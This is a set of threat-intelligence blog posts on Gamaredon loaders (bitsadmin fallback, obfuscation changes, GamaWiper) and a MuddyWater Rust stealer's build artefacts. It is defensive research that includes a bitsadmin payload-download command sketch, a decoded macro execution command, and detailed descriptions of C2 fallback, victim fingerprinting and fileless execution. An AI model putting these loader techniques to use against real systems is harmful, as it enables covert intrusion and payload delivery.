If the goal is to actually understand a threat actor, not just label a sample and move on, then obsessing over individual functions, opcodes and micro-optimizations only gets you part of the way.
That level of detail is useful, but it doesn't tell you how the tooling evolves, where engineering effort is invested, which ideas get abandoned or how operational priorities shift over time.
These signals live in the truly boring parts: build artefacts, dependency drift, architectural refactors, version churn and the occasional accidental breadcrumb left behind in a binary.
When you line those up over multiple samples, you start seeing intent and process instead of isolated behaviour, and that is exactly what we want ^-^

Gamaredon: Now Downloading via Windows Update's Best Friend "BITS"

by Robin Dost


There's yet another update in Gamaredon's GamaLoad scripts, which pushed me to write this article and to slightly revisit my previous post Defending Against Gamaredon: Practical Controls That Actually Work.

In this article, I distinguish between GamaLoad and Pterodo. I still consider GamaLoad a transitional stage, primarily implemented as a defensive layer to slow down analysis rather than as a fundamentally new capability.
That said, there are visible changes both in payload delivery and in obfuscation.

I’ll mainly focus on what has changed since my last posts. If you’re interested in the broader context and historical behavior, have a look at the previous articles first.

For this analysis, I pulled the latest Gamaredon sample with the hash:

3538618e0ae0f7e73d96843d90323178b1d434262a074fc24be8e36283e7dd92

and dropped it straight into my tracking framework.

From a delivery perspective, not much has changed compared to Gamaredon's last shift. The victim still receives a RAR archive as an attachment. When opened or extracted, it drops an HTA file into the Startup folder, infecting the system on the next reboot.
A few minutes later, my tracking system already picked up the first fresh GamaLoad samples for analysis.

When comparing these new samples to the December 2025 batch, one thing immediately stood out:
they are almost twice as large and noticeably more obfuscated.

(Left column: line count, right column: hash+date)

The obfuscation hasn't just increased (which, honestly, doesn't help much given how terrible Gamaredon's obfuscation usually is :D), but it has also become slightly smarter.

Historically, their scripts contained tons of junk loops that served absolutely no purpose and could simply be deleted during manual deobfuscation. In the newer samples, however, more variables defined inside those junk blocks are later reused in the actual execution flow.

So if you’re still deobfuscating by hand or your automation isn’t fully mature yet, you’ll want to be a bit more careful here.

(Variable larkxGg is defined in the junk loop, but used after it)
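If you automate dead-code removal, a quick liveness check helps avoid deleting junk blocks whose variables are reused later. A minimal sketch (regex-based and deliberately crude; the variable names are illustrative, except larkxGg, which is taken from the screenshot above):

```python
import re


def vars_unsafe_to_strip(junk_block: str, rest_of_script: str) -> set:
    """Return variables assigned inside a junk block that are read later on."""
    # collect left-hand sides of simple assignments inside the junk block
    assigned = set(re.findall(r"^\s*(\w+)\s*=", junk_block, re.MULTILINE))
    # keep only those that are referenced anywhere in the remaining script
    return {v for v in assigned
            if re.search(rf"\b{re.escape(v)}\b", rest_of_script)}


junk = "larkxGg = 14\ntmpQz = tmpQz + 3\n"
rest = "objShell.Run larkxGg & strCmd\n"
print(vars_unsafe_to_strip(junk, rest))  # {'larkxGg'}
```

Anything the function returns must survive deobfuscation; everything else in the junk block can still be dropped safely.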

The Interesting Part

A few days ago, I published an article showing how surprisingly easy it is to defend against Gamaredon by blocking a small set of Windows tools such as mshta.exe or MSXML2.XMLHTTP.
If you’re honest about it, Gamaredon’s tooling is… let’s say “not exactly impressive”. Blocking a handful of abused LOLBins already makes payload delivery painfully difficult for them. Their development is slow, incremental, and often fairly predictable.

Well, I guess they noticed.

The defensive measures described in that article have now been bypassed.
Don’t worry though, we’ll adjust accordingly 😁

Fallback on Fallback: Now Featuring BITS


The new GamaLoad script still relies on a familiar fallback structure to retrieve and execute payloads from their delivery infrastructure.

Conceptually, this is very simple: the script keeps trying different URLs until one successfully returns a payload. If everything fails, an empty string is returned.

What’s new is that this fallback logic now has… another fallback.

If no payload stage can be retrieved via the usual mechanisms, the script switches to downloading the payload using bitsadmin.

What is bitsadmin?

bitsadmin is a Windows utility used to control the Background Intelligent Transfer Service (BITS), which provides reliable background downloads and uploads.
Attackers abuse it as a Living-off-the-Land Binary (LOLBin) to quietly retrieve payloads without dropping additional tooling onto disk.

From an attacker’s perspective, BITS has some very attractive properties:

  • resilient background transfers
  • native proxy support
  • high reliability on unstable networks
  • no obvious “malware-looking” process tree

exactly the kind of boring enterprise plumbing malware loves to hide in ^^
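For reference, a typical bitsadmin download one-liner looks roughly like the following. Sketched here as Python assembling the command rather than executing it; the URL, job name and output path are hypothetical placeholders, not IOCs from the sample:

```python
# Assemble a bitsadmin transfer command (illustrative values only)
url = "http://example.invalid/payload.bin"   # hypothetical delivery URL
dest = r"C:\Users\Public\update.tmp"         # hypothetical drop path

cmd = [
    "bitsadmin", "/transfer", "updJob",      # /transfer creates a job and waits
    "/download", "/priority", "foreground",  # foreground = complete as fast as possible
    url, dest,
]
print(" ".join(cmd))
```

The transfer itself is then performed by the BITS service inside svchost.exe, which is why the process tree around the downloading script stays so unremarkable.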


Why Gamaredon Switched to BITS

For years, Gamaredon heavily relied on classic LOLBins such as mshta.exe and MSXML2.XMLHTTP for payload delivery and execution.
By now, these techniques are:

  • blocked by default in many environments (AppLocker, ASR rules, EDR hardening)
  • trivial to detect via signatures and behavior
  • operationally noisy (suspicious child processes, script artifacts, obvious telemetry)

BITS lives in a much more comfortable gray zone:

  • it supports persistent and robust downloads
  • it is actively used by Windows itself (Windows Update, Defender, Office, etc.)
  • blocking it outright often creates operational risk in enterprise environments
  • its network traffic looks boring and legitimate (svchost.exe, Microsoft-like headers)
  • it works reliably behind proxies and restrictive networks

If your previous delivery pipeline keeps getting kicked in the teeth by defenders, BITS is a logical next step, even for an actor whose tooling evolution is usually measured in geological time.

Is This a Problem?

Not really.

In my article Defending Against Gamaredon: Practical Controls That Actually Work, I now show how you can effectively mitigate BITS abuse without breaking normal business operations.

So yes: Gamaredon adapted.
And yes we’ll adapt again. That’s kind of the point. 🙂

MuddyWater: When Your Build System Becomes an IOC – “Jacob”


by Robin Dost

EDIT 2026-01-18: I published a follow-up article analyzing the evolution and version history of the latest RustyStealer samples, focusing on change tracking, tooling evolution, and architectural shifts across multiple builds

Today I was bored, so I decided to take a short break from Russian threat actors and spend a day with our friends from Iran instead.
I grabbed a sample attributed to MuddyWater (hash: "f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f", sample from here) and originally planned to do a fairly standard malware analysis.

That plan lasted about five minutes.

What started as a normal sample quickly turned into something much more interesting for me:
the developer didn’t properly strip the binary and left behind a lot of build artefacts, enough to sketch a pretty solid profile of the development toolchain behind this malware.

In this post I won’t go into a full behavioral or functional analysis of the payload itself.
Instead, I'll focus on what we can learn purely from the developer's mistakes, what kind of profile we can derive from them and how this information can be useful for clustering and campaign tracking.
A more traditional malware analysis of this sample will follow in a future post.

Quick Context: Who Is MuddyWater Anyway?

Before going any further, a quick bit of context on MuddyWater, because this part actually matters for what follows.

MuddyWater is a long-running Iranian threat actor commonly associated with the Iranian Ministry of Intelligence and Security (MOIS). The group is primarily known for espionage-driven operations targeting government institutions, critical infrastructure, telecommunications and various organizations across the Middle East and parts of Europe.

This is not some random crimeware operator copy-pasting loaders from GitHub like script kiddies.
We’re talking about a mature, state-aligned actor with a long operational history and a fairly diverse malware toolkit.

Which is exactly why the amount of build and development artefacts left in this sample is so interesting.


The initial sample is a .doc file.
Honestly, nothing fancy: just a Word document with a macro that reconstructs an EXE from hex, writes it to disk and executes it. Classic stuff.

I started with oleid:

oleid f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc

As expected, the document contains VBA macros, so next step:

olevba --analysis f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc

Clearly malicious. No surprises here.
To get a closer look at the macro itself, I exported it using:

olevba -c f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc > makro.vba

Now we can see the actual macro code:

Apart from some typos and random variable names, most of this is just junk code.
What actually happens is pretty straightforward:

  • WriteHexToFile takes a hex string from UserForm1.TextBox1.Text, converts it to bytes and writes it to:
    C:\ProgramData\CertificationKit.ini
  • love_me__ constructs the following command from ASCII values:
99 109 100 46 101 120 101 = cmd.exe
32 47 99 32 = /c
67 58 92 80 114 111 + "gramData\CertificationKit.ini"
= C:\ProgramData\CertificationKit.ini

Final result:

cmd.exe /c C:\ProgramData\CertificationKit.ini

While the payload shows a clear shift towards modern Rust-based tooling, the document dropper still relies on “obfuscation” techniques that wouldn’t look out of place in early 2000s VBA malware. Turning strings into ASCII integers and adding unreachable trigonometric conditions mostly just makes human analysts roll their eyes. It provides essentially zero resistance against automated analysis, but hey, let’s move on.
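The ASCII reconstruction can be replayed in a couple of lines (the byte values are copied from the macro listing above):

```python
# Replay the macro's ASCII-integer string building
part1 = [99, 109, 100, 46, 101, 120, 101]  # "cmd.exe"
part2 = [32, 47, 99, 32]                   # " /c "
part3 = [67, 58, 92, 80, 114, 111]         # "C:\Pro"

cmd = "".join(map(chr, part1 + part2 + part3)) + "gramData\\CertificationKit.ini"
print(cmd)  # cmd.exe /c C:\ProgramData\CertificationKit.ini
```

Which also makes clear why this "obfuscation" is worthless against automation: the integers decode to the final command with zero runtime dependency.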


Extracting the Payload

To extract the binary cleanly, I wrote a small Python script:

#!/usr/bin/env python3
# Author: Robin Dost
# Created: 10.01.2025
# Extracts the embedded binary payload from a MuddyWater VBA macro document

import re
import sys
from pathlib import Path

import olefile

DOC = Path(sys.argv[1])
OUT = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("payload.bin")

STREAM = "Macros/UserForm1/o"

def main():
    if not DOC.exists():
        raise SystemExit(f"File not found: {DOC}")

    ole = olefile.OleFileIO(str(DOC))
    try:
        if not ole.exists(STREAM.split("/")):
            # list streams for troubleshooting
            print("stream not found. Available streams:")
            for s in ole.listdir(streams=True, storages=False):
                print("    " + "/".join(s))
            raise SystemExit(1)

        data = ole.openstream(STREAM.split("/")).read()
    finally:
        ole.close()

    # Extract long hex runs
    hex_candidates = re.findall(rb"(?:[0-9A-Fa-f]{2}){200,}", data)
    if not hex_candidates:
        raise SystemExit("[!] No large hex blob found in the form stream.")

    hex_blob = max(hex_candidates, key=len)
    # strip stray non-hex characters (just in case) before converting
    hex_blob = re.sub(rb"[^0-9A-Fa-f]", b"", hex_blob)

    payload = bytes.fromhex(hex_blob.decode("ascii"))
    OUT.write_bytes(payload)

    print(f"wrote {len(payload)} bytes to: {OUT}")
    print(f"first 2 bytes: {payload[:2]!r} (expect b'MZ' for PE)")

if __name__ == "__main__":
    main()

In the end I get a proper PE32+ executable, which we can now analyze further.

SHA256 of the extracted payload:

7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58

If we check the hash on VirusTotal, we can see that the file is already known, but only very recently:

We also get multiple attributions pointing toward MuddyWater:

So far, nothing controversial: this is a MuddyWater RustyStealer sample, as we've already seen before.


Build Artefacts: Where Things Get Interesting

Now that we have the final payload, I loaded it into Ghidra.
First thing I always check: strings.

And immediately something interesting pops up:

The binary was clearly not properly stripped and contains a large amount of leftover build artefacts.
Most notably, we can see the username “Jacob” in multiple build paths.

No, this does not automatically mean the developer's real name is Jacob.
But it does mean that the build environment uses an account named Jacob and that alone is already useful for clustering.

I went through all remaining artefacts and summarized the most interesting findings and what they tell us about the developer and their environment.

Operating System

Windows

Evidence:

C:\Users\Jacob\...
C:\Users\...\rustup\toolchains\...
windows-registry crate
schannel TLS

This was built natively on Windows.
No Linux cross-compile involved.

Programming Language & Toolchain

Rust (MSVC Toolchain)

Evidence:

stable-x86_64-pc-windows-msvc
.cargo\registry
.rustup\toolchains

Target Triple:
x86_64-pc-windows-msvc

This is actually quite useful information, because many malware authors either:

  • build on Linux and cross-compile for Windows or
  • use the GNU toolchain on Windows

Here we're looking at a real Windows dev host with Visual C++ build tools installed.

Username in Build Paths

C:\Users\Jacob\

Again, not proof of identity, but a very strong clustering indicator.
If this path shows up again in other samples, you can (confidently) link them to the same build environment or toolchain.
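A trivial way to hunt for such artefacts across a sample set is to grep binaries for Windows user-profile paths. A sketch (pattern only; real triage would also cover PDB paths and cargo registry strings):

```python
import re

# match "C:\Users\<name>\" style paths embedded in raw binary data
USER_PATH = re.compile(rb"[A-Za-z]:\\Users\\([^\\\x00]+)\\")


def build_usernames(blob: bytes) -> set:
    """Extract account names from embedded Windows user-profile paths."""
    return set(USER_PATH.findall(blob))


sample = b"\x00C:\\Users\\Jacob\\.cargo\\registry\\src\\...\x00"
print(build_usernames(sample))  # {b'Jacob'}
```

Run over a corpus, this gives you a cheap clustering key that survives infrastructure rotation.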

Build Quality & OPSEC Trade-Offs

The binary contains:

  • panic strings
  • assertion messages
  • full source paths

Examples:

  • assertion failed: ...
  • internal error inside hyper...

Which suggests:

  • no panic = abort
  • no aggressive stripping
  • no serious release hardening focused on OPSEC

Development speed and convenience clearly won over build sanitization.

Which is honestly pretty typical for APT tooling, but this is still very sloppy ngl.

Dependency Stack & Framework Fingerprint

Crates and versions found in the binary:

  • atomic-waker-1.1.2
  • base64-0.22.1
  • bytes-1.10.1
  • cipher-0.4.4
  • ctr-0.9.2
  • futures-channel-0.3.31
  • futures-core-0.3.31
  • futures-util-0.3.31
  • generic-array-0.14.7
  • h2-0.4.12
  • hashbrown-0.15.5
  • http-1.3.1
  • httparse-1.10.1
  • http-body-util-0.1.3
  • hyper-1.7.0
  • hyper-tls-0.6.0
  • hyper-util-0.1.16
  • icu_normalizer-2.0.0
  • idna-1.1.0
  • indexmap-2.11.0
  • ipnet-2.11.0
  • iri-string-0.7.8
  • mio-1.0.4
  • percent-encoding-2.3.2
  • rand-0.6.5
  • reqwest-0.12.23
  • smallvec-1.15.1
  • socket2-0.6.0
  • tokio-1.47.1
  • tower-0.5.2
  • universal-hash-0.5.1
  • url-2.5.7
  • utf8_iter-1.0.4
  • want-0.3.1
  • windows-registry-0.5.3

What information we can extract from this:

Network Stack

  • Async HTTP client (reqwest)
  • Full hyper stack (hyper, hyper-util, http, httparse)
  • HTTP/1.1 and HTTP/2 support (h2)
  • TLS via Windows Schannel (hyper-tls)
  • Low-level socket handling (socket2, mio)

So this is very clearly not basic WinInet abuse or some minimal download logic.
It's essentially a full-featured HTTP client stack assembled from modern Rust networking libs, with proper async handling.

Looks much more like a persistent implant than a simple one-shot loader.

Async Runtime

  • tokio
  • futures-*
  • atomic-waker

This strongly suggests an event-driven design with concurrent tasks, typical for beaconing, task polling and long-running background activity.

Not what you would expect from a disposable stage loader.

Crypto

  • cipher
  • ctr
  • universal-hash
  • generic-array
  • plus base64

Active use of AEAD-style primitives, very likely AES-GCM or something close to it.

Which, to me, looks like:

  • encrypted embedded configuration
  • and/or encrypted C2 communication

Either way, encryption is clearly part of the design.

rustc-demangle

Another telling artefact is the presence of source paths from the rustc-demangle crate, including references to .llvm./rust/deps/.../src/lib.rs

These are build-time paths leaking straight out of the developer's Cargo environment. In my opinion this means that panic handling and backtrace support were left enabled, instead of using an aggressive panic=abort and stripping strategy.

Local Development Environment

Paths like:

.cargo\registry\src\index.crates.io-1949cf8c6b5b557f\

Indicate:

  • standard Cargo cache layout
  • no Docker build
  • no CI/CD path patterns

This was almost certainly built locally on the developer's Windows workstation or VM.
Just someone hitting cargo build on their dev box.
Relatable, honestly

Compiler Version (Indirectly)

Multiple references to:

/rustc/ded5c06cf21d2b93bffd5d884aa6e96934ee4234/

This is the Rust compiler commit hash.

That allows fairly accurate mapping to a Rust release version
(very likely around Rust 1.92.0)

Which is extremely useful for:

  • temporal analysis of campaigns
  • toolchain reuse detection
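Extracting the commit hash programmatically is trivial; the hash-to-release mapping itself then comes from the rust-lang/rust repository tags. A regex sketch:

```python
import re

# rustc embeds source paths of the form /rustc/<40-hex-commit>/...
RUSTC_PATH = re.compile(rb"/rustc/([0-9a-f]{40})/")


def rustc_commit(blob: bytes):
    """Pull the embedded rustc commit hash out of raw binary data, if present."""
    m = RUSTC_PATH.search(blob)
    return m.group(1).decode() if m else None


blob = b"\x00/rustc/ded5c06cf21d2b93bffd5d884aa6e96934ee4234/library/core\x00"
print(rustc_commit(blob))  # ded5c06cf21d2b93bffd5d884aa6e96934ee4234
```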

Internal Project Structure (More Dev Leaks)

src\main.rs
src\modules\persist.rs
src\modules\interface.rs

That tells us a lot:

Modular Architecture
  • persist > persistence module
  • interface > C2 interface or command handling

This is not just a single-purpose loader.
This is a modular implant much closer to a full backdoor framework than a simple dropper.


What This Tells Us About the Developer & Operation

Technical Profile

  • Rust developer
  • works on Windows
  • uses MSVC toolchain
  • builds locally, not via CI
  • comfortable with async networking
  • understands TLS and proxy handling

Operational Assumptions

  • expects EDR solutions (found a lot of AV-related strings, but not too relevant tbh)
  • expects proxy environments
  • targets corporate networks
  • uses modular architecture for flexibility

OPSEC Choices

  • prioritizes development speed
  • does not heavily sanitize builds
  • accepts leakage of build artefacts (LOL)

Which again fits very well with how many state-aligned toolchains are developed:
fast iteration, internal use and limited concern about reverse-engineering friction.

From a threat hunting perspective, these artefacts are far more useful than yet another short-lived C2 domain: they allow us to track the toolchain, not just the infrastructure.

What Build Artifacts Reveal About Actor Development

Build artifacts embedded in operational malware are more than just accidental leaks: they offer a look into an actor's internal development maturity.
Exposed compiler paths, usernames, project directories or debug strings strongly suggest the absence of a hardened release pipeline.
In mature development environments, build systems are typically isolated, stripped of identifiable metadata and designed to produce reproducible, sanitized artifacts.
When these indicators repeatedly appear in live payloads, it points to ad-hoc or poorly automated build processes rather than a structured CI/CD workflow.
The continued presence of build artifacts across multiple campaigns is particularly telling.
It indicates not just a single operational mistake, but a lack of learning or feedback integration over time. Actors that actively monitor public reporting and adapt their tooling usually remediate these issues quickly.
Those that do not reveal organizational constraints, limited quality assurance or sustained time pressure within their development cycle.
I'll start doing some more research on MuddyWater in the next few weeks to get a better understanding of whether this was a single incident or a general problem in MuddyWater's development process.
Leaving build artefacts in your malware is rarely about "oops, forgot to strip the binary".
It's more a side effect of how development, testing and deployment are glued together inside the operation.
From a defender's POV, that's actually way more useful than yet another throwaway C2 domain / IP.
These artefacts don't rotate every week; they give you fingerprints that can survive multiple campaigns.

Gamaredon: Same Goal, Fewer Fingerprints


by Robin Dost

In malware analysis, it is tempting to describe change as innovation.
New tricks, new tooling, new malware families.
What is far more revealing, however, is how little actually changes and what changes anyway.

Between late November and the end of December 2025, several Gamaredon-related VBScript loaders surfaced that are, functionally, almost identical. They all execute the same mechanism, rely on the same execution primitive, and ultimately aim for the same outcome.

And yet, something does change, quietly, incrementally, and very deliberately.

This article focuses strictly on observable, concrete shifts in obfuscation, not assumptions, not intent inferred from tooling, and not architectural leaps that are not supported by the samples themselves.

For this analysis, I used the following samples:

Date of Sample   Hash                                                                Download
19.12.2025       6de9f436ba393744a3966b35ea2254dde2f84f5b796c6f7bee4b67ccf96ccf0a    Download
22.12.2025       9218528a40a48a3c96df3b49a7498f6ea2a961f43249081b17880709f73392c1    Download
25.12.2025       2c69fd052bfaa03cd0e956af0f638f82bc53f23ee8d0c273e688e257dac8c550    Download
30.12.2025       846748912aa6e86b9d11f6779af6aae26b7258f8610d5e28eff0083779737824    Download


25 November 2025 – Noise Without Structure

The earliest sample is dominated by volume.

Characteristics:

  • Hundreds of variables that are written to once and never read again
  • Repeated arithmetic mutations (x = x + 14) without semantic relevance
  • Long linear execution flow
  • No variable declarations (Dim entirely absent)

The obfuscation here serves one purpose only: syntactic noise.

There is no attempt to:

  • Hide control flow
  • Delay string resolution
  • Reconstruct logic conditionally

Everything is present in the source, just buried under irrelevant assignments.

From an analyst’s perspective, this sample is noisy but predictable.
Once dead code is ignored, execution logic collapses into a short, linear sequence.


19 December 2025 – Indicator overload

The mid-December sample introduces a clear and measurable change: indicator density.

New observations:

  • A significant increase in hard-coded URLs
  • URLs pointing to unrelated, legitimate, and state-adjacent domains
  • No execution dependency on most of these URLs

Crucially, these URLs are not obfuscated. They are placed in plain sight.

This is not string hiding; it is indicator flooding.

The obfuscation shift here is not technical complexity, but analytical friction:

  • Automated extraction produces dozens of false leads
  • IOC-based clustering becomes unreliable
  • Manual triage cost increases without changing execution logic

The loader still behaves linearly. What changes is the signal-to-noise ratio.


22 December 2025 – Defensive Reaction at the Payload Layer

The December 22 sample is not an obfuscation milestone, but it is a defensive one.

From a loader perspective, almost nothing changes:

  • The download URL is fully present and statically recoverable
  • No additional string hiding or control-flow manipulation is introduced
  • Execution remains linear and transparent

However, focusing solely on loader complexity misses the actual shift.

The real change happens at the payload layer.

For the first time in this series, the loader delivers GamaWiper instead of Pterodo to analysis environments.

This is not a neutral substitution.

As outlined in my earlier analysis of GamaWiper's behavior, this payload is explicitly designed to wipe suspected analysis environments instead of handing them the real payload.

In other words:
Gamaredon reacts defensively, just not in the loader yet.

Why obfuscation does not increase here

The absence of additional loader obfuscation is not a contradiction, but a signal.

At this stage:

  • The defensive burden is shifted entirely onto the payload
  • The loader acts as a transparent delivery mechanism
  • Analysis deterrence is achieved through destructive behavior, not concealment

This suggests a deliberate sequencing:

  1. Introduce a hostile payload to counter analysis
  2. Observe detection and response
  3. Only then begin hardening the delivery mechanism itself

Why this sample matters

~ December 22 marks the point where Gamaredon stops merely being observed and starts actively responding.

Not by hiding better, but by ensuring that seeing the payload has consequences.

The subsequent increase in loader obfuscation after this date does not replace this strategy.
It complements it.

Payload hostility first.
Delivery hardening second.

Notably, this change occurs almost exactly four weeks after my article outlining practical approaches to tracking Gamaredon infrastructure went public.
Whether coincidence or feedback loop, the timing aligns remarkably well with the first observed deployment of GamaWiper as an anti-analysis response.


25 December 2025 – Control-Flow Noise Appears

The Christmas sample does not introduce new primitives, but it does introduce execution ambiguity.

Concrete changes:

  • Multiple .Run invocations exist
  • Not all of them result in meaningful execution
  • Several objects and variables are constructed but never used
  • Execution order is less visually obvious

This is not branching logic, but control-flow camouflage.

The analyst can still reconstruct execution, but:

  • Dead paths look plausible
  • Execution sinks are no longer unique
  • Automated heuristics struggle to identify the real one

The obfuscation no longer targets strings; it targets execution clarity.


30 December 2025 – Fragmented Runtime Assembly

The final sample introduces the most tangible structural changes.

Observed differences:

  • Systematic use of Dim declarations
  • Extensive use of short, non-semantic string fragments
  • Assembly of execution-relevant strings via repeated concatenation across distant code sections
  • No complete execution string exists statically
  • Embedded domains are now just random, invalid domains

At no point does the full execution command exist as a contiguous value in the source.

Instead:

  • Fragments are combined
  • Recombined
  • Passed through intermediate variables
  • Finalized immediately before execution

This directly degrades:

  • Static string extraction
  • Signature-based detection
  • Regex-driven tooling

No encryption is added.
The shift is purely architectural.
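The fragmentation pattern is easy to mimic in a few lines; the fragments below are illustrative, not taken from the samples. A static regex looking for the complete command never matches the source, even though the runtime value is fully formed:

```python
import re

# Fragments scattered across distant parts of the script (illustrative)
f1, f2, f3 = "msh", "ta.e", "xe"
mid = f1 + f2   # partial assembly in one code section
cmd = mid + f3  # finalized right before execution

source_text = f'f1, f2, f3 = "{f1}", "{f2}", "{f3}"'
assert re.search(r"mshta\.exe", source_text) is None  # static scan misses it
assert cmd == "mshta.exe"                             # runtime value is complete
```

Detection therefore has to move from string matching towards emulation or behavioral observation of the final sink.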


05 January 2026 – Added Datetime Parameter to URL

EDIT 07.01.2026: I added this part as new findings appeared

Since early January, another small but relevant change appeared in the loader logic.

The scripts now generate a date value at runtime:

This value is then embedded directly into the download path, resulting in URLs like:

.../UkrNet_02.01.2026/cutting/02.01.2026/hannah8342.pdf

From a detection standpoint, this is subtle but effective.

This means:

  • payload paths change daily
  • static URL signatures age out immediately
  • and IOC reuse across campaigns becomes unreliable
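The date-stamping itself takes one line to reproduce; the domain below is a hypothetical placeholder, while the path components mirror the observed URL structure:

```python
from datetime import date

# Build a date-stamped delivery path in the observed DD.MM.YYYY style
stamp = date.today().strftime("%d.%m.%Y")
url = f"http://example.invalid/UkrNet_{stamp}/cutting/{stamp}/hannah8342.pdf"
print(url)
```

Any URL-based signature written today points at a path that no longer exists tomorrow, which is the whole point.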

Relation to Prior Observations

This behavior aligns closely with patterns discussed in my earlier article on GamaWiper and Gamaredon’s anti-analysis strategies, where delivery behavior adapts based on perceived execution context.

https://blog.synapticsystems.de/gamawiper-explained-gamaredon-anti-analysis/


What Actually Changed and What Did Not

What did not change:

  • Execution primitive
  • Loader purpose
  • Overall delivery mechanism

What did change:

  • When execution-relevant strings become complete
  • How many false execution paths exist
  • How much irrelevant context surrounds the real logic

This is not a rewrite.
It is iterative hardening.


Conclusion

These samples do not demonstrate innovation.
They demonstrate attention.

Each iteration removes one assumption analysts rely on:

  • “The string will exist somewhere”
  • “The execution path is obvious”
  • “Dead code looks dead”

Gamaredon did not add complexity for its own sake.
They added just enough friction to slow analysis and then stopped.

And that restraint is, in itself, the most telling signal.

GamaWiper Explained: Gamaredon’s “New” Anti-Analysis Weapon


by Robin Dost

After my recent blog posts covering Gamaredon’s ongoing PterodoGraph campaign targeting Ukraine, and following almost a full month of silence in terms of newly observed malware samples, fresh activity has finally resurfaced.

New samples have appeared, along with reports pointing to a component now referred to as GamaWiper.

It is important to note that GamaWiper, or at least very similar scripts, had already been observed in Gamaredon operations in previous months.
From a purely technical standpoint, this functionality is therefore not entirely new.

What is new, however, is the context in which it is now being deployed.

In this article, I aim to shed some light on what GamaWiper actually is, why Gamaredon is actively delivering it at this stage of the infection chain, and what this shift tells us about the group’s current operational mindset.
What initially appears to be just another destructive payload in fact turns out to be a deliberate control mechanism, one that decides who receives the real malware and who gets wiped instead.

I’ll keep this post a bit shorter and focus only on what’s new, so it doesn’t get boring.
If you’re looking for deeper technical details, please refer to my previous posts from 22.11.2025 and 13.11.2025, where I covered the core mechanics in depth.

For this analysis, I’m using my deobfuscated version of the sample; next time I’ll maybe show you how to deobfuscate Gamaredon scripts manually in less than 10 minutes.

After downloading the latest Gamaredon malware sample, it immediately became obvious that the current variants differ noticeably from what we’ve seen before.

SHA256: 6de9f436ba393744a3966b35ea2254dde2f84f5b796c6f7bee4b67ccf96ccf0a

Note: I started writing YARA Rules for Gamaredons current samples, you can find them here.


Key Changes at a Glance

  • Junk URLs now closely resemble real payload delivery URLs
  • No full Pterodo payload is delivered anymore 🙁
  • Gamaredon has hardened the delivery of Pterodo samples

Infection Flow – What Changed?

After the user opens the RAR archive and infects their system, the behavior initially looks familiar.
On reboot, the Pterodo sample is fetched again, but only if the client is geolocated in Ukraine, as already mentioned in my previous blog posts.

Previously, non-UA clients would simply receive:

  • an empty page, or
  • an empty file

Today, however, things look a bit different.

Instead, the client receives GamaWiper.


GamaWiper – Sandbox? Gone.

GamaWiper is essentially a sandbox / VM killer whose sole purpose is to prevent analysis environments from seeing anything useful.

In earlier campaigns, this wasn’t always handled very well.
For example, when I used Hybrid-Analysis, it was trivial to extract:

  • Telegram channels
  • Graph URLs
  • infrastructure relationships

This was a classic infrastructure design flaw and a great example of what budget cuts can do to an APT operation 😄

Today, however, the approach is much simpler:

If a sandbox is detected -> wipe it

No telemetry, no infrastructure leaks, no fun.

If you are doing legitimate malware research and are interested in (deobfuscated) samples from Gamaredon, you can write me an email.


Initial Loader: “GamaLoad”

The initial loader, which I’ll refer to as GamaLoad, implements a multi-stage payload fetch mechanism with dynamically constructed URLs and headers.
The goal is resilience: fetch stage two no matter what.

Note: All malicious domains have been removed.


Request Characteristics

Request Type

  • Method: GET
  • Client: msxml2.xmlhttp
  • Execution: synchronous

URL Structure

Each request fetches a randomly generated resource:

/<random>.<ext>
  • Random filename: 7-10 characters (a-z, 0-9)
  • Camouflage extensions, e.g.:
    • wmv
    • yuv
    • lgc
    • rm
    • jpeg
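A hypothetical reconstruction of that resource-name generation (the helper name is mine; the character set, length range, and extension list follow the description above):

```python
import random
import string

# Camouflage extensions observed in the campaign
CAMOUFLAGE_EXTS = ["wmv", "yuv", "lgc", "rm", "jpeg"]

def random_resource() -> str:
    # /<random>.<ext> with a 7-10 character [a-z0-9] filename
    length = random.randint(7, 10)
    name = "".join(random.choices(string.ascii_lowercase + string.digits, k=length))
    return f"/{name}.{random.choice(CAMOUFLAGE_EXTS)}"
```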

C2 Fallback Order

The script iterates through multiple sources until a valid payload is received:

  1. Argument URL (if passed at execution)
  2. Hardcoded fallback
  3. Cloudflare Workers domain
  4. Domain fetch using @ notation
  5. Abuse of the URL userinfo field
  6. Dynamic host via check-host.net
    • HTML parsing
    • live host extraction
  7. Alternative domain (again using @ notation)
  8. Registry-based URL

Once a working C2 is found, it is stored as a persistent C2 entry.


HTTP Headers

The request uses very explicit and intentionally crafted headers.

User-Agent

A browser-like string combined with a host fingerprint, including:

  • Computer name
  • Drive serial number (hex-encoded)
  • Timestamp
    • UTC+2
    • Ukrainian local time expected
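The fingerprinted User-Agent can be sketched like this. The separator and field order are my assumptions; only the fields themselves (computer name, hex-encoded drive serial, UTC+2 timestamp) come from the observed requests.

```python
from datetime import datetime, timedelta, timezone

def build_user_agent(computer_name: str, drive_serial: int) -> str:
    # Browser-like prefix plus a per-victim host fingerprint.
    # Timestamp is UTC+2, i.e. the expected Ukrainian local time.
    ts = datetime.now(timezone(timedelta(hours=2))).strftime("%d.%m.%Y %H:%M:%S")
    base = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    return f"{base}::{computer_name}_{drive_serial:08X}_{ts}"
```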

Cookie

  • Static campaign identifier
  • Rotates regularly (more on that below)

Content-Length

  • Explicitly set
  • Even for GET requests

Enables victim identification & tracking
Also plays a role in proxy evasion (see below)


Success Condition

A request is considered successful when:

  • HTTP status is 200
  • Response size is greater than 91 bytes

Once this condition is met, all remaining fallbacks are skipped.
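Put together, the fallback iteration and success condition behave roughly like this sketch (a Python stand-in for the actual VBScript; http_get is a placeholder for the synchronous msxml2.xmlhttp request):

```python
def fetch_stage_two(sources, http_get):
    # Try each C2 candidate in order until a response meets the
    # observed success condition: HTTP 200 and a body larger than
    # 91 bytes. All remaining fallbacks are then skipped.
    for url in sources:
        status, body = http_get(url)
        if status == 200 and len(body) > 91:
            return url, body  # this URL becomes the persistent C2 entry
    return None, b""
```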


Payload Processing

  1. Payload received as binary
  2. UTF-8 conversion
  3. Cleanup (CR/LF, delimiters)
  4. Base64 decoding
  5. In-memory execution

No disk writes – classic fileless execution
